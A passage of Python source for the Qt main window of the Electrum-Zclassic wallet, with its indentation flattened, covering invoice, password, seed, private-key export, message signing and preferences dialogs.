self.show_message(_('Invoice saved as' + ' ' + fn))
exportButton = EnterButton(_('Save'), do_export)
def do_delete():
if self.question(_('Delete invoice?')):
self.invoices.remove(key)
self.history_list.update()
self.invoice_list.update()
d.close()
deleteButton = EnterButton(_('Delete'), do_delete)
vbox.addLayout(Buttons(exportButton, deleteButton, CloseButton(d)))
d.exec_()
def do_pay_invoice(self, key):
pr = self.invoices.get(key)
self.payment_request = pr
self.prepare_for_payment_request()
pr.error = None # this forces verify() to re-run
if pr.verify(self.contacts):
self.payment_request_ok()
else:
self.payment_request_error()
def create_console_tab(self):
from .console import Console
self.console = console = Console()
return console
def update_console(self):
console = self.console
console.history = self.config.get("console-history",[])
console.history_index = len(console.history)
console.updateNamespace({'wallet' : self.wallet,
'network' : self.network,
'plugins' : self.gui_object.plugins,
'window': self})
console.updateNamespace({'util' : util, 'bitcoin':bitcoin})
c = commands.Commands(self.config, self.wallet, self.network, lambda: self.console.set_json(True))
methods = {}
def mkfunc(f, method):
return lambda *args: f(method, args, self.password_dialog)
for m in dir(c):
if m[0]=='_' or m in ['network','wallet']: continue
methods[m] = mkfunc(c._run, m)
console.updateNamespace(methods)
def create_status_bar(self):
sb = QStatusBar()
sb.setFixedHeight(35)
qtVersion = qVersion()
self.balance_label = QLabel("")
self.balance_label.setTextInteractionFlags(Qt.TextSelectableByMouse)
self.balance_label.setStyleSheet("""QLabel { padding: 0 }""")
sb.addWidget(self.balance_label)
self.search_box = QLineEdit()
self.search_box.textChanged.connect(self.do_search)
self.search_box.hide()
sb.addPermanentWidget(self.search_box)
self.lock_icon = QIcon()
self.password_button = StatusBarButton(self.lock_icon, _("Password"), self.change_password_dialog )
sb.addPermanentWidget(self.password_button)
sb.addPermanentWidget(StatusBarButton(QIcon(":icons/preferences.png"), _("Preferences"), self.settings_dialog ) )
self.seed_button = StatusBarButton(QIcon(":icons/seed.png"), _("Seed"), self.show_seed_dialog )
sb.addPermanentWidget(self.seed_button)
self.status_button = StatusBarButton(QIcon(":icons/status_disconnected.png"), _("Network"), lambda: self.gui_object.show_network_dialog(self))
sb.addPermanentWidget(self.status_button)
run_hook('create_status_bar', sb)
self.setStatusBar(sb)
def update_lock_icon(self):
icon = QIcon(":icons/lock.png") if self.wallet.has_password() else QIcon(":icons/unlock.png")
self.password_button.setIcon(icon)
def update_buttons_on_seed(self):
self.seed_button.setVisible(self.wallet.has_seed())
self.password_button.setVisible(self.wallet.may_have_password())
self.send_button.setVisible(not self.wallet.is_watching_only())
def change_password_dialog(self):
from electrum_zclassic.storage import STO_EV_XPUB_PW
if self.wallet.get_available_storage_encryption_version() == STO_EV_XPUB_PW:
from .password_dialog import ChangePasswordDialogForHW
d = ChangePasswordDialogForHW(self, self.wallet)
ok, encrypt_file = d.run()
if not ok:
return
try:
hw_dev_pw = self.wallet.keystore.get_password_for_storage_encryption()
except UserCancelled:
return
except BaseException as e:
traceback.print_exc(file=sys.stderr)
self.show_error(str(e))
return
old_password = hw_dev_pw if self.wallet.has_password() else None
new_password = hw_dev_pw if encrypt_file else None
else:
from .password_dialog import ChangePasswordDialogForSW
d = ChangePasswordDialogForSW(self, self.wallet)
ok, old_password, new_password, encrypt_file = d.run()
if not ok:
return
try:
self.wallet.update_password(old_password, new_password, encrypt_file)
except InvalidPassword as e:
self.show_error(str(e))
return
except BaseException:
traceback.print_exc(file=sys.stdout)
self.show_error(_('Failed to update password'))
return
msg = _('Password was updated successfully') if self.wallet.has_password() else _('Password is disabled, this wallet is not protected')
self.show_message(msg, title=_("Success"))
self.update_lock_icon()
def toggle_search(self):
tab = self.tabs.currentWidget()
#if hasattr(tab, 'searchable_list'):
# tab.searchable_list.toggle_toolbar()
#return
self.search_box.setHidden(not self.search_box.isHidden())
if not self.search_box.isHidden():
self.search_box.setFocus(1)
else:
self.do_search('')
def do_search(self, t):
tab = self.tabs.currentWidget()
if hasattr(tab, 'searchable_list'):
tab.searchable_list.filter(t)
def new_contact_dialog(self):
d = WindowModalDialog(self, _("New Contact"))
vbox = QVBoxLayout(d)
vbox.addWidget(QLabel(_('New Contact') + ':'))
grid = QGridLayout()
line1 = QLineEdit()
line1.setFixedWidth(280)
line2 = QLineEdit()
line2.setFixedWidth(280)
grid.addWidget(QLabel(_("Address")), 1, 0)
grid.addWidget(line1, 1, 1)
grid.addWidget(QLabel(_("Name")), 2, 0)
grid.addWidget(line2, 2, 1)
vbox.addLayout(grid)
vbox.addLayout(Buttons(CancelButton(d), OkButton(d)))
if d.exec_():
self.set_contact(line2.text(), line1.text())
def show_master_public_keys(self):
dialog = WindowModalDialog(self, _("Wallet Information"))
dialog.setMinimumSize(500, 100)
mpk_list = self.wallet.get_master_public_keys()
vbox = QVBoxLayout()
wallet_type = self.wallet.storage.get('wallet_type', '')
grid = QGridLayout()
basename = os.path.basename(self.wallet.storage.path)
grid.addWidget(QLabel(_("Wallet name")+ ':'), 0, 0)
grid.addWidget(QLabel(basename), 0, 1)
grid.addWidget(QLabel(_("Wallet type")+ ':'), 1, 0)
grid.addWidget(QLabel(wallet_type), 1, 1)
grid.addWidget(QLabel(_("Script type")+ ':'), 2, 0)
grid.addWidget(QLabel(self.wallet.txin_type), 2, 1)
vbox.addLayout(grid)
if self.wallet.is_deterministic():
mpk_text = ShowQRTextEdit()
mpk_text.setMaximumHeight(150)
mpk_text.addCopyButton(self.app)
def show_mpk(index):
mpk_text.setText(mpk_list[index])
# only show the combobox in case multiple accounts are available
if len(mpk_list) > 1:
def label(key):
if isinstance(self.wallet, Multisig_Wallet):
return _("cosigner") + ' ' + str(key+1)
return ''
labels = [label(i) for i in range(len(mpk_list))]
on_click = lambda clayout: show_mpk(clayout.selected_index())
labels_clayout = ChoicesLayout(_("Master Public Keys"), labels, on_click)
vbox.addLayout(labels_clayout.layout())
else:
vbox.addWidget(QLabel(_("Master Public Key")))
show_mpk(0)
vbox.addWidget(mpk_text)
vbox.addStretch(1)
vbox.addLayout(Buttons(CloseButton(dialog)))
dialog.setLayout(vbox)
dialog.exec_()
def remove_wallet(self):
if self.question('\n'.join([
_('Delete wallet file?'),
"%s"%self.wallet.storage.path,
_('If your wallet contains funds, make sure you have saved its seed.')])):
self._delete_wallet()
@protected
def _delete_wallet(self, password):
wallet_path = self.wallet.storage.path
basename = os.path.basename(wallet_path)
self.gui_object.daemon.stop_wallet(wallet_path)
self.close()
os.unlink(wallet_path)
self.show_error("Wallet removed:" + basename)
@protected
def show_seed_dialog(self, password):
if not self.wallet.has_seed():
self.show_message(_('This wallet has no seed'))
return
keystore = self.wallet.get_keystore()
try:
seed = keystore.get_seed(password)
passphrase = keystore.get_passphrase(password)
except BaseException as e:
self.show_error(str(e))
return
from .seed_dialog import SeedDialog
d = SeedDialog(self, seed, passphrase)
d.exec_()
def show_qrcode(self, data, title = _("QR code"), parent=None):
if not data:
return
d = QRDialog(data, parent or self, title)
d.exec_()
@protected
def show_private_key(self, address, password):
if not address:
return
try:
pk, redeem_script = self.wallet.export_private_key(address, password)
except Exception as e:
traceback.print_exc(file=sys.stdout)
self.show_message(str(e))
return
xtype = bitcoin.deserialize_privkey(pk)[0]
d = WindowModalDialog(self, _("Private key"))
d.setMinimumSize(600, 150)
vbox = QVBoxLayout()
vbox.addWidget(QLabel(_("Address") + ': ' + address))
vbox.addWidget(QLabel(_("Script type") + ': ' + xtype))
vbox.addWidget(QLabel(_("Private key") + ':'))
keys_e = ShowQRTextEdit(text=pk)
keys_e.addCopyButton(self.app)
vbox.addWidget(keys_e)
if redeem_script:
vbox.addWidget(QLabel(_("Redeem Script") + ':'))
rds_e = ShowQRTextEdit(text=redeem_script)
rds_e.addCopyButton(self.app)
vbox.addWidget(rds_e)
vbox.addLayout(Buttons(CloseButton(d)))
d.setLayout(vbox)
d.exec_()
msg_sign = _("Signing with an address actually means signing with the corresponding "
"private key, and verifying with the corresponding public key. The "
"address you have entered does not have a unique public key, so these "
"operations cannot be performed.") + '\n\n' + \
_('The operation is undefined. Not just in Electrum, but in general.')
@protected
def do_sign(self, address, message, signature, password):
address = address.text().strip()
message = message.toPlainText().strip()
if not bitcoin.is_address(address):
self.show_message(_('Invalid Zclassic address.'))
return
if self.wallet.is_watching_only():
self.show_message(_('This is a watching-only wallet.'))
return
if not self.wallet.is_mine(address):
self.show_message(_('Address not in wallet.'))
return
txin_type = self.wallet.get_txin_type(address)
if txin_type not in ['p2pkh']:
self.show_message(_('Cannot sign messages with this type of address:') + \
' ' + txin_type + '\n\n' + self.msg_sign)
return
task = partial(self.wallet.sign_message, address, message, password)
def show_signed_message(sig):
try:
signature.setText(base64.b64encode(sig).decode('ascii'))
except RuntimeError:
# (signature) wrapped C/C++ object has been deleted
pass
self.wallet.thread.add(task, on_success=show_signed_message)
def do_verify(self, address, message, signature):
address = address.text().strip()
message = message.toPlainText().strip().encode('utf-8')
if not bitcoin.is_address(address):
self.show_message(_('Invalid Zclassic address.'))
return
try:
# This can throw on invalid base64
sig = base64.b64decode(str(signature.toPlainText()))
verified = bitcoin.verify_message(address, sig, message)
except Exception as e:
verified = False
if verified:
self.show_message(_("Signature verified"))
else:
self.show_error(_("Wrong signature"))
def sign_verify_message(self, address=''):
d = WindowModalDialog(self, _('Sign/verify Message'))
d.setMinimumSize(610, 290)
layout = QGridLayout(d)
message_e = QTextEdit()
layout.addWidget(QLabel(_('Message')), 1, 0)
layout.addWidget(message_e, 1, 1)
layout.setRowStretch(2,3)
address_e = QLineEdit()
address_e.setText(address)
layout.addWidget(QLabel(_('Address')), 2, 0)
layout.addWidget(address_e, 2, 1)
signature_e = QTextEdit()
layout.addWidget(QLabel(_('Signature')), 3, 0)
layout.addWidget(signature_e, 3, 1)
layout.setRowStretch(3,1)
hbox = QHBoxLayout()
b = QPushButton(_("Sign"))
b.clicked.connect(lambda: self.do_sign(address_e, message_e, signature_e))
hbox.addWidget(b)
b = QPushButton(_("Verify"))
b.clicked.connect(lambda: self.do_verify(address_e, message_e, signature_e))
hbox.addWidget(b)
b = QPushButton(_("Close"))
b.clicked.connect(d.accept)
hbox.addWidget(b)
layout.addLayout(hbox, 4, 1)
d.exec_()
@protected
def do_decrypt(self, message_e, pubkey_e, encrypted_e, password):
if self.wallet.is_watching_only():
self.show_message(_('This is a watching-only wallet.'))
return
cyphertext = encrypted_e.toPlainText()
task = partial(self.wallet.decrypt_message, pubkey_e.text(), cyphertext, password)
def setText(text):
try:
message_e.setText(text.decode('utf-8'))
except RuntimeError:
# (message_e) wrapped C/C++ object has been deleted
pass
self.wallet.thread.add(task, on_success=setText)
def do_encrypt(self, message_e, pubkey_e, encrypted_e):
message = message_e.toPlainText()
message = message.encode('utf-8')
try:
encrypted = bitcoin.encrypt_message(message, pubkey_e.text())
encrypted_e.setText(encrypted.decode('ascii'))
except BaseException as e:
traceback.print_exc(file=sys.stdout)
self.show_warning(str(e))
def encrypt_message(self, address=''):
d = WindowModalDialog(self, _('Encrypt/decrypt Message'))
d.setMinimumSize(610, 490)
layout = QGridLayout(d)
message_e = QTextEdit()
layout.addWidget(QLabel(_('Message')), 1, 0)
layout.addWidget(message_e, 1, 1)
layout.setRowStretch(2,3)
pubkey_e = QLineEdit()
if address:
pubkey = self.wallet.get_public_key(address)
pubkey_e.setText(pubkey)
layout.addWidget(QLabel(_('Public key')), 2, 0)
layout.addWidget(pubkey_e, 2, 1)
encrypted_e = QTextEdit()
layout.addWidget(QLabel(_('Encrypted')), 3, 0)
layout.addWidget(encrypted_e, 3, 1)
layout.setRowStretch(3,1)
hbox = QHBoxLayout()
b = QPushButton(_("Encrypt"))
b.clicked.connect(lambda: self.do_encrypt(message_e, pubkey_e, encrypted_e))
hbox.addWidget(b)
b = QPushButton(_("Decrypt"))
b.clicked.connect(lambda: self.do_decrypt(message_e, pubkey_e, encrypted_e))
hbox.addWidget(b)
b = QPushButton(_("Close"))
b.clicked.connect(d.accept)
hbox.addWidget(b)
layout.addLayout(hbox, 4, 1)
d.exec_()
def password_dialog(self, msg=None, parent=None):
from .password_dialog import PasswordDialog
parent = parent or self
d = PasswordDialog(parent, msg)
return d.run()
def tx_from_text(self, txt):
from electrum_zclassic.transaction import tx_from_str
try:
tx = tx_from_str(txt)
return Transaction(tx)
except BaseException as e:
self.show_critical(_("Electrum-Zclassic was unable to parse your transaction") + ":\n" + str(e))
return
def read_tx_from_qrcode(self):
from electrum_zclassic import qrscanner
try:
data = qrscanner.scan_barcode(self.config.get_video_device())
except BaseException as e:
self.show_error(str(e))
return
if not data:
return
# if the user scanned a zclassic URI
if str(data).startswith("zclassic:"):
self.pay_to_URI(data)
return
# else if the user scanned an offline signed tx
try:
data = bh2u(bitcoin.base_decode(data, length=None, base=43))
except BaseException as e:
self.show_error((_('Could not decode QR code')+':\n{}').format(e))
return
tx = self.tx_from_text(data)
if not tx:
return
self.show_transaction(tx)
def read_tx_from_file(self):
fileName = self.getOpenFileName(_("Select your transaction file"), "*.txn")
if not fileName:
return
try:
with open(fileName, "r") as f:
file_content = f.read()
except (ValueError, IOError, os.error) as reason:
self.show_critical(_("Electrum-Zclassic was unable to open your transaction file") + "\n" + str(reason), title=_("Unable to read file or no transaction found"))
return
return self.tx_from_text(file_content)
def do_process_from_text(self):
text = text_dialog(self, _('Input raw transaction'), _("Transaction:"), _("Load transaction"))
if not text:
return
tx = self.tx_from_text(text)
if tx:
self.show_transaction(tx)
def do_process_from_file(self):
tx = self.read_tx_from_file()
if tx:
self.show_transaction(tx)
def do_process_from_txid(self):
from electrum_zclassic import transaction
txid, ok = QInputDialog.getText(self, _('Lookup transaction'), _('Transaction ID') + ':')
if ok and txid:
txid = str(txid).strip()
try:
r = self.network.synchronous_get(('blockchain.transaction.get',[txid]))
except BaseException as e:
self.show_message(str(e))
return
tx = transaction.Transaction(r)
self.show_transaction(tx)
@protected
def export_privkeys_dialog(self, password):
if self.wallet.is_watching_only():
self.show_message(_("This is a watching-only wallet"))
return
if isinstance(self.wallet, Multisig_Wallet):
self.show_message(_('WARNING: This is a multi-signature wallet.') + '\n' +
_('It cannot be "backed up" by simply exporting these private keys.'))
d = WindowModalDialog(self, _('Private keys'))
d.setMinimumSize(980, 300)
vbox = QVBoxLayout(d)
msg = "%s\n%s\n%s" % (_("WARNING: ALL your private keys are secret."),
_("Exposing a single private key can compromise your entire wallet!"),
_("In particular, DO NOT use 'redeem private key' services proposed by third parties."))
vbox.addWidget(QLabel(msg))
e = QTextEdit()
e.setReadOnly(True)
vbox.addWidget(e)
defaultname = 'electrum-zclassic-private-keys.csv'
select_msg = _('Select file to export your private keys to')
hbox, filename_e, csv_button = filename_field(self, self.config, defaultname, select_msg)
vbox.addLayout(hbox)
b = OkButton(d, _('Export'))
b.setEnabled(False)
vbox.addLayout(Buttons(CancelButton(d), b))
private_keys = {}
addresses = self.wallet.get_addresses()
done = False
cancelled = False
def privkeys_thread():
for addr in addresses:
time.sleep(0.1)
if done or cancelled:
break
privkey = self.wallet.export_private_key(addr, password)[0]
private_keys[addr] = privkey
self.computing_privkeys_signal.emit()
if not cancelled:
self.computing_privkeys_signal.disconnect()
self.show_privkeys_signal.emit()
def show_privkeys():
s = "\n".join( map( lambda x: x[0] + "\t"+ x[1], private_keys.items()))
e.setText(s)
b.setEnabled(True)
self.show_privkeys_signal.disconnect()
nonlocal done
done = True
def on_dialog_closed(*args):
nonlocal done
nonlocal cancelled
if not done:
cancelled = True
self.computing_privkeys_signal.disconnect()
self.show_privkeys_signal.disconnect()
self.computing_privkeys_signal.connect(lambda: e.setText("Please wait... %d/%d"%(len(private_keys),len(addresses))))
self.show_privkeys_signal.connect(show_privkeys)
d.finished.connect(on_dialog_closed)
threading.Thread(target=privkeys_thread).start()
if not d.exec_():
done = True
return
filename = filename_e.text()
if not filename:
return
try:
self.do_export_privkeys(filename, private_keys, csv_button.isChecked())
except (IOError, os.error) as reason:
txt = "\n".join([
_("Electrum-Zclassic was unable to produce a private key-export."),
str(reason)
])
self.show_critical(txt, title=_("Unable to create csv"))
except Exception as e:
self.show_message(str(e))
return
self.show_message(_("Private keys exported."))
def do_export_privkeys(self, fileName, pklist, is_csv):
with open(fileName, "w+") as f:
if is_csv:
transaction = csv.writer(f)
transaction.writerow(["address", "private_key"])
for addr, pk in pklist.items():
transaction.writerow(["%34s"%addr,pk])
else:
import json
f.write(json.dumps(pklist, indent = 4))
def do_import_labels(self):
def import_labels(path):
def _validate(data):
return data # TODO
def import_labels_assign(data):
for key, value in data.items():
self.wallet.set_label(key, value)
import_meta(path, _validate, import_labels_assign)
def on_import():
self.need_update.set()
import_meta_gui(self, _('labels'), import_labels, on_import)
def do_export_labels(self):
def export_labels(filename):
export_meta(self.wallet.labels, filename)
export_meta_gui(self, _('labels'), export_labels)
def sweep_key_dialog(self):
d = WindowModalDialog(self, title=_('Sweep private keys'))
d.setMinimumSize(600, 300)
vbox = QVBoxLayout(d)
vbox.addWidget(QLabel(_("Enter private keys:")))
keys_e = ScanQRTextEdit(allow_multi=True)
keys_e.setTabChangesFocus(True)
vbox.addWidget(keys_e)
addresses = self.wallet.get_unused_addresses()
if not addresses:
try:
addresses = self.wallet.get_receiving_addresses()
except AttributeError:
addresses = self.wallet.get_addresses()
h, address_e = address_field(addresses)
vbox.addLayout(h)
vbox.addStretch(1)
button = OkButton(d, _('Sweep'))
vbox.addLayout(Buttons(CancelButton(d), button))
button.setEnabled(False)
def get_address():
addr = str(address_e.text()).strip()
if bitcoin.is_address(addr):
return addr
def get_pk():
text = str(keys_e.toPlainText())
return keystore.get_private_keys(text)
f = lambda: button.setEnabled(get_address() is not None and get_pk() is not None)
on_address = lambda text: address_e.setStyleSheet((ColorScheme.DEFAULT if get_address() else ColorScheme.RED).as_stylesheet())
keys_e.textChanged.connect(f)
address_e.textChanged.connect(f)
address_e.textChanged.connect(on_address)
if not d.exec_():
return
from electrum_zclassic.wallet import sweep_preparations
try:
self.do_clear()
coins, keypairs = sweep_preparations(get_pk(), self.network)
self.tx_external_keypairs = keypairs
self.spend_coins(coins)
self.payto_e.setText(get_address())
self.spend_max()
self.payto_e.setFrozen(True)
self.amount_e.setFrozen(True)
except BaseException as e:
self.show_message(str(e))
return
self.warn_if_watching_only()
def _do_import(self, title, msg, func):
text = text_dialog(self, title, msg + ' :', _('Import'),
allow_multi=True)
if not text:
return
bad = []
good = []
for key in str(text).split():
try:
addr = func(key)
good.append(addr)
except BaseException as e:
bad.append(key)
continue
if good:
self.show_message(_("The following addresses were added") + ':\n' + '\n'.join(good))
if bad:
self.show_critical(_("The following inputs could not be imported") + ':\n'+ '\n'.join(bad))
self.address_list.update()
self.history_list.update()
def import_addresses(self):
if not self.wallet.can_import_address():
return
title, msg = _('Import addresses'), _("Enter addresses")
self._do_import(title, msg, self.wallet.import_address)
@protected
def do_import_privkey(self, password):
if not self.wallet.can_import_privkey():
return
title, msg = _('Import private keys'), _("Enter private keys")
self._do_import(title, msg, lambda x: self.wallet.import_private_key(x, password))
def update_fiat(self):
b = self.fx and self.fx.is_enabled()
self.fiat_send_e.setVisible(b)
self.fiat_receive_e.setVisible(b)
self.history_list.refresh_headers()
self.history_list.update()
self.address_list.refresh_headers()
self.address_list.update()
self.update_status()
def settings_dialog(self):
self.need_restart = False
d = WindowModalDialog(self, _('Preferences'))
vbox = QVBoxLayout()
tabs = QTabWidget()
gui_widgets = []
fee_widgets = []
tx_widgets = []
id_widgets = []
# language
lang_help = _('Select which language is used in the GUI (after restart).')
lang_label = HelpLabel(_('Language') + ':', lang_help)
lang_combo = QComboBox()
from electrum_zclassic.i18n import languages
lang_combo.addItems(list(languages.values()))
try:
index = languages.keys().index(self.config.get("language",''))
except Exception:
index = 0
lang_combo.setCurrentIndex(index)
if not self.config.is_modifiable('language'):
for w in [lang_combo, lang_label]: w.setEnabled(False)
def on_lang(x):
lang_request = list(languages.keys())[lang_combo.currentIndex()]
if lang_request != self.config.get('language'):
self.config.set_key("language", lang_request, True)
self.need_restart = True
lang_combo.currentIndexChanged.connect(on_lang)
gui_widgets.append((lang_label, lang_combo))
nz_help = _('Number of zeros displayed after the decimal point. For example, if this is set to 2, "1." will be displayed as "1.00"')
nz_label = HelpLabel(_('Zeros after decimal point') + ':', nz_help)
nz = QSpinBox()
nz.setMinimum(0)
nz.setMaximum(self.decimal_point)
nz.setValue(self.num_zeros)
if not self.config.is_modifiable('num_zeros'):
for w in [nz, nz_label]: w.setEnabled(False)
def on_nz():
value = nz.value()
if self.num_zeros != value:
self.num_zeros = value
self.config.set_key('num_zeros', value, True)
self.history_list.update()
self.address_list.update()
nz.valueChanged.connect(on_nz)
gui_widgets.append((nz_label, nz))
msg = '\n'.join([
_('Time based: fee rate is based on average confirmation time estimates'),
]
)
fee_type_label = HelpLabel(_('Fee estimation') + ':', msg)
fee_type_combo = QComboBox()
fee_type_combo.addItems([_('Static'), _('ETA')])
fee_type_combo.setCurrentIndex((2 if self.config.use_mempool_fees() else 1) if self.config.is_dynfee() else 0)
def on_fee_type(x):
self.config.set_key('mempool_fees', False)
self.config.set_key('dynamic_fees', x>0)
self.fee_slider.update()
fee_type_combo.currentIndexChanged.connect(on_fee_type)
fee_widgets.append((fee_type_label, fee_type_combo))
feebox_cb = QCheckBox(_('Edit fees manually'))
feebox_cb.setChecked(self.config.get('show_fee', True))
feebox_cb.setToolTip(_("Show fee edit box in send tab."))
def on_feebox(x):
self.config.set_key('show_fee', x == Qt.Checked)
self.fee_adv_controls.setVisible(bool(x))
feebox_cb.stateChanged.connect(on_feebox)
fee_widgets.append((feebox_cb, None))
msg = _('OpenAlias record, used to receive coins and to sign payment requests.') + '\n\n'\
+ _('The following alias providers are available:') + '\n'\
+ '\n'.join(['https://cryptoname.co/', 'http://xmr.link']) + '\n\n'\
+ 'For more information, see https://openalias.org'
alias_label = HelpLabel(_('OpenAlias') + ':', msg)
alias = self.config.get('alias','')
alias_e = QLineEdit(alias)
def set_alias_color():
if not self.config.get('alias'):
alias_e.setStyleSheet("")
return
if self.alias_info:
alias_addr, alias_name, validated = self.alias_info
alias_e.setStyleSheet((ColorScheme.GREEN if validated else ColorScheme.RED).as_stylesheet(True))
else:
alias_e.setStyleSheet(ColorScheme.RED.as_stylesheet(True))
def on_alias_edit():
alias_e.setStyleSheet("")
alias = str(alias_e.text())
self.config.set_key('alias', alias, True)
if alias:
self.fetch_alias()
set_alias_color()
self.alias_received_signal.connect(set_alias_color)
alias_e.editingFinished.connect(on_alias_edit)
id_widgets.append((alias_label, alias_e))
# SSL certificate
msg = ' '.join([
_('SSL certificate used to sign payment requests.'),
_('Use setconfig to set ssl_chain and ssl_privkey.'),
])
if self.config.get('ssl_privkey') or self.config.get('ssl_chain'):
try:
SSL_identity = paymentrequest.check_ssl_config(self.config)
SSL_error = None
except BaseException as e:
SSL_identity = "error"
SSL_error = str(e)
else:
SSL_identity = ""
SSL_error = None
SSL_id_label = HelpLabel(_('SSL certificate') + ':', msg)
SSL_id_e = QLineEdit(SSL_identity)
SSL_id_e.setStyleSheet((ColorScheme.RED if SSL_error else ColorScheme.GREEN).as_stylesheet(True) if SSL_identity else '')
if SSL_error:
SSL_id_e.setToolTip(SSL_error)
SSL_id_e.setReadOnly(True)
id_widgets.append((SSL_id_label, SSL_id_e))
units = ['ZCL', 'mZCL', 'uZCL']
msg = (_('Base unit of your wallet.')
+ '\n1 ZCL = 1000 mZCL. 1 mZCL = 1000 uZCL.\n'
+ _('This setting affects the Send tab, and all balance related fields.'))
unit_label = HelpLabel(_('Base unit') + ':', msg)
unit_combo = QComboBox()
unit_combo.addItems(units)
unit_combo.setCurrentIndex(units.index(self.base_unit()))
def on_unit(x, nz):
unit_result = units[unit_combo.currentIndex()]
if self.base_unit() == unit_result:
return
edits = self.amount_e, self.fee_e, self.receive_amount_e
amounts = [edit.get_amount() for edit in edits]
if unit_result == 'ZCL':
self.decimal_point = 8
elif unit_result == 'mZCL':
self.decimal_point = 5
elif unit_result == 'uZCL':
self.decimal_point = 2
else:
raise Exception('Unknown base unit')
self.config.set_key('decimal_point', self.decimal_point, True)
nz.setMaximum(self.decimal_point)
self.history_list.update()
self.request_list.update()
self.address_list.update()
for edit, amount in zip(edits, amounts):
edit.setAmount(amount)
self.update_status()
unit_combo.currentIndexChanged.connect(lambda x: on_unit(x, nz))
gui_widgets.append((unit_label, unit_combo))
block_explorers = sorted(util.block_explorer_info().keys())
msg = _('Choose which online block explorer to use for functions that open a web browser')
block_ex_label = HelpLabel(_('Online Block Explorer') + ':', msg)
block_ex_combo = QComboBox()
block_ex_combo.addItems(block_explorers)
block_ex_combo.setCurrentIndex(block_ex_combo.findText(util.block_explorer(self.config)))
def on_be(x):
be_result = block_explorers[block_ex_combo.currentIndex()]
self.config.set_key('block_explorer', be_result, True)
block_ex_combo.currentIndexChanged.connect(on_be)
gui_widgets.append((block_ex_label, block_ex_combo))
from electrum_zclassic import qrscanner
system_cameras = qrscanner._find_system_cameras()
qr_combo = QComboBox()
qr_combo.addItem("Default","default")
for camera, device in system_cameras.items():
qr_combo.addItem(camera, device)
#combo.addItem("Manually specify a device", config.get("video_device"))
index = qr_combo.findData(self.config.get("video_device"))
qr_combo.setCurrentIndex(index)
msg = _("Install the zbar package to enable this.")
qr_label = HelpLabel(_('Video Device') + ':', msg)
qr_combo.setEnabled(qrscanner.libzbar is not None)
on_video_device = lambda x: self.config.set_key("video_device", qr_combo.itemData(x), True)
qr_combo.currentIndexChanged.connect(on_video_device)
gui_widgets.append((qr_label, qr_combo))
usechange_cb = QCheckBox(_('Use change addresses'))
usechange_cb.setChecked(self.wallet.use_change)
if not self.config.is_modifiable('use_change'): usechange_cb.setEnabled(False)
def on_usechange(x):
usechange_result = x == Qt.Checked
if self.wallet.use_change != usechange_result:
self.wallet.use_change = usechange_result
self.wallet.storage.put('use_change', self.wallet.use_change)
multiple_cb.setEnabled(self.wallet.use_change)
usechange_cb.stateChanged.connect(on_usechange)
usechange_cb.setToolTip(_('Using change addresses makes it more difficult for other people to track your transactions.'))
tx_widgets.append((usechange_cb, None))
def on_multiple(x):
multiple = x == Qt.Checked
if self.wallet.multiple_change != multiple:
self.wallet.multiple_change = multiple
self.wallet.storage.put('multiple_change', multiple)
multiple_change = self.wallet.multiple_change
multiple_cb = QCheckBox(_('Use multiple change addresses'))
multiple_cb.setEnabled(self.wallet.use_change)
multiple_cb.setToolTip('\n'.join([
_('In some cases, use up to 3 change addresses in order to break '
'up large coin amounts and obfuscate the recipient address.'),
_('This may result in higher transactions fees.')
]))
multiple_cb.setChecked(multiple_change)
multiple_cb.stateChanged.connect(on_multiple)
tx_widgets.append((multiple_cb, None))
def fmt_docs(key, klass):
lines = [ln.lstrip(" ") for ln in klass.__doc__.split("\n")]
return '\n'.join([key, "", " ".join(lines)])
choosers = sorted(coinchooser.COIN_CHOOSERS.keys())
if len(choosers) > 1:
chooser_name = coinchooser.get_name(self.config)
msg = _('Choose coin (UTXO) selection method. The following are available:\n\n')
msg += '\n\n'.join(fmt_docs(*item) for item in coinchooser.COIN_CHOOSERS.items())
chooser_label = HelpLabel(_('Coin selection') + ':', msg)
chooser_combo = QComboBox()
chooser_combo.addItems(choosers)
i = choosers.index(chooser_name) if chooser_name in choosers else 0
chooser_combo.setCurrentIndex(i)
def on_chooser(x):
chooser_name = choosers[chooser_combo.currentIndex()]
self.config.set_key('coin_chooser', chooser_name)
chooser_combo.currentIndexChanged.connect(on_chooser)
tx_widgets.append((chooser_label, chooser_combo))
def on_unconf(x):
self.config.set_key('confirmed_only', bool(x))
conf_only = self.config.get('confirmed_only', False)
unconf_cb = QCheckBox(_('Spend only confirmed coins'))
unconf_cb.setToolTip(_('Spend only confirmed inputs.'))
unconf_cb.setChecked(conf_only)
unconf_cb.stateChanged.connect(on_unconf)
tx_widgets.append((unconf_cb, None))
def on_outrounding(x):
self.config.set_key('coin_chooser_output_rounding', bool(x))
enable_outrounding = self.config.get('coin_chooser_output_rounding', False)
outrounding_cb = QCheckBox(_('Enable output value rounding'))
outrounding_cb.setToolTip(
_('Set the value of the change output so that it has similar precision to the other outputs.') + '\n' +
_('This might improve your privacy somewhat.') + '\n' +
_('If enabled, at most 100 satoshis might be lost due to this, per transaction.'))
outrounding_cb.setChecked(enable_outrounding)
outrounding_cb.stateChanged.connect(on_outrounding)
tx_widgets.append((outrounding_cb, None))
# Fiat Currency
hist_checkbox = QCheckBox()
hist_capgains_checkbox = QCheckBox()
fiat_address_checkbox = QCheckBox()
ccy_combo = QComboBox()
ex_combo = QComboBox()
def update_currencies():
if not self.fx: return
currencies = sorted(self.fx.get_currencies(self.fx.get_history_config()))
ccy_combo.clear()
ccy_combo.addItems([_('None')] + currencies)
if self.fx.is_enabled():
ccy_combo.setCurrentIndex(ccy_combo.findText(self.fx.get_currency()))
def update_history_cb():
if not self.fx: return
hist_checkbox.setChecked(self.fx.get_history_config())
hist_checkbox.setEnabled(self.fx.is_enabled())
def update_fiat_address_cb():
if not self.fx: return
fiat_address_checkbox.setChecked(self.fx.get_fiat_address_config())
def update_history_capgains_cb():
if not self.fx: return
hist_capgains_checkbox.setChecked(self.fx.get_history_capital_gains_config())
hist_capgains_checkbox.setEnabled(hist_checkbox.isChecked())
def update_exchanges():
if not self.fx: return
b = self.fx.is_enabled()
ex_combo.setEnabled(b)
if b:
h = self.fx.get_history_config()
c = self.fx.get_currency()
exchanges = self.fx.get_exchanges_by_ccy(c, h)
else:
exchanges = self.fx.get_exchanges_by_ccy('USD', False)
ex_combo.clear()
ex_combo.addItems(sorted(exchanges))
ex_combo.setCurrentIndex(ex_combo.findText(self.fx.config_exchange()))
def on_currency(hh):
if not self.fx: return
b = bool(ccy_combo.currentIndex())
ccy = str(ccy_combo.currentText()) if b else None
self.fx.set_enabled(b)
if b and ccy != self.fx.ccy:
